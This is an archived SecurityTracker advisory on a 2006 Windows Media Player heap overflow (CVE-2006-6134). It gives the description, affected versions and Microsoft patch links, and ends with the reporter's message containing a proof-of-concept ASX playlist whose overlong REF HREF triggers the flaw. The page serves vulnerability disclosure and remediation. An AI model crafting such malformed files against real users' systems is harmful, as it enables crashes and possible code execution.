SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Windows Media Player Vendors:   Microsoft
Windows Media Player ASX Playlist File Buffer Overflow May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017354
SecurityTracker URL:  http://securitytracker.com/id/1017354
CVE Reference:   CVE-2006-6134   (Links to External Site)
Updated:  Dec 13 2007
Original Entry Date:  Dec 7 2006
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6.4, 10, also Windows Media Format 7.1 through 9.5
Description:   A vulnerability was reported in Windows Media Player. A remote user can cause denial of service conditions. A remote user may be able to cause arbitrary code to be executed on the target user's system.

A remote user can create a specially crafted ASX playlist file that, when loaded by the target user, will trigger a heap overflow in 'WMVCORE.DLL' and potentially execute arbitrary code on the target system. The code will run with the privileges of the target user.

A 'REF HREF' tag with an unrecognized protocol can trigger the flaw.

The report did not confirm arbitrary code execution. However, eEye Digital Security indicates that code execution is "likely."

ASX files referenced within HTML pages may be auto-opened.

sehato at yandex.ru reported this vulnerability.

Impact:   A remote user can create an ASX file that, when loaded by the target user, may execute arbitrary code on the target user's system.
Solution:   The vendor has issued the following fixes:

Microsoft Windows 2000 Service Pack 4:

http://www.microsoft.com/downloads/details.aspx?FamilyId=ef2dbcb6-cc8e-4299-a1e6-e6db202b41d5

Microsoft Windows XP Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=19ca4b44-2b60-4270-9c42-f5063c627f91

Microsoft Windows XP Professional x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=7322327f-abd9-4595-98dd-a19ef41652fc

Microsoft Windows Server 2003 or Microsoft Windows Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=0cb64ad7-9b54-4e26-9125-e9e9a0c0fc65

Microsoft Windows Server 2003 x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=2203c66c-6722-42d5-a7dc-ac5e71402542

Microsoft Windows XP Professional x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=c5ece3cd-ac7b-46b4-99dc-74a6b0f323d0

Microsoft Windows Server 2003 x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=c5ece3cd-ac7b-46b4-99dc-74a6b0f323d0

Windows 2000 Service Pack 4:

http://www.microsoft.com/downloads/details.aspx?FamilyId=e63ccdc3-a2ed-4ef6-b8a1-3f8be4b2726d

Microsoft Windows XP Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=e63ccdc3-a2ed-4ef6-b8a1-3f8be4b2726d

Microsoft Windows XP Professional x64 Edition and Microsoft Windows XP Professional x64 Edition Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=a5240618-5975-4ef2-9749-4cccddb786c7

Microsoft Windows Server 2003 or on Microsoft Windows Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=e63ccdc3-a2ed-4ef6-b8a1-3f8be4b2726d

Microsoft Windows Server 2003 x64 Edition and Microsoft Windows Server 2003 x64 Edition Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=a4fca647-01b7-4201-85e8-1647412742b0

A restart is not required.

On December 11, 2007, Microsoft reported that Windows XP Professional x64 Edition SP2 and Windows Server 2003 x64 Edition SP2 are also affected [and are now listed above].

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms06-078.mspx

Vendor URL:  www.microsoft.com/technet/security/bulletin/ms06-078.mspx (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (2000), Windows (2003), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  Windows Media ASX PlayList File Denial Of Service Vulnerability

Windows Media ASX PlayList File Denial Of Service Vulnerability

Tested:
Windows Media 10.00.00.4036
Windows XP SP2

file "example.asx":

<asx><entry>
<ref href="aa:/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaa.mp3"/>
</entry></asx>

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC